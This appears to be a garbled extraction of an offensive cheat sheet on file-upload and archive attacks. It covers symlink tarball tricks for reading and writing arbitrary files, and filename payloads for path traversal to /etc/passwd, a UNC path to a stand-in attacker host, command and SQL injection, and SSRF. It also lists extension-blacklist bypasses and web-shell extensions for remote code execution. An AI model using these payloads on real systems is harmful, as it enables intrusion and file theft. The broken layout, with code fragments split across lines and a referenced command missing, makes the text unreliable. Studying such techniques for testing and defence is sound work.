tar
and zip
allow you to include symlinks in tarballs/archives they generated. If an application does not properly validate the content of the archives, it can lead to arbitrary reading/writing of files.tar
command to extract .tar
files, removes symlinks and accesses subdirectory directly, you can try to bypass the symlink removing process with tar permissions. Unix tar
command preserves the unix permissions assigned to it while creating the archive. If you create a parent directory which no one have read permissions (set chmod to 300
) while creating the subdirectory with the complete permissions (set the chmod to 700
), you can include symlinks inside the subdirectory that will not be found during the symlink removing process, but will be found when accessing directly since the subdirectory has read permissions.tar
, jar
, war
, cpio
, apk
, rar
and 7z
.filename=/etc/passwd
filename=../../../../../../etc/passwd
filename=\\attacker-website.com\file.png
a$(whoami)z.png
, a`whoami`z.png
or a';select+sleep(10);--z.png
filename=https://172.17.0.1/internal/file
. You can also try to change type="file"
to type="url"
within a request.GIF89a
to make the server think we are sending it a valid GIF..phtml
.jpg.svg
or .svg.jpg
%0a
, %09
, %0d
, %00
, #
, etc. For example, file.png%00.svg
or file.png\x0d\x0a.svg
file.
.sVG
.svg
file.%E2%80%AEphp.jpg
, see Report: RTL override symbol not stripped from file names​filename="file.png";filename="file.svg"
.aspx
, you can upload a file called shell.aspx.
. Now this filename will bypass the blacklist, as .aspx != .aspx.
, but upon saving the file to the server, Windows will cut out the trailing .
, leaving shell.aspx
.calc.exe
inside file.txt
:calc.exe
copy, you can run the following command:.htaccess
and the ASP.NET/IIS web.config
files. You can check your server/framework and try to upload particular config to bypass some security measures or even execute code.asp
, ashx
, asmx
, asa
, aspx
, cer
or xamlx
extensions to get RCE.cfm
, cfml
, cfc
or dbm
extensions to get RCE.jsp
, jspx
, jsw
, jsv
, or jspf
extensions to get RCE.pl
, pm
, cgi
, or lib
extensions to get RCE.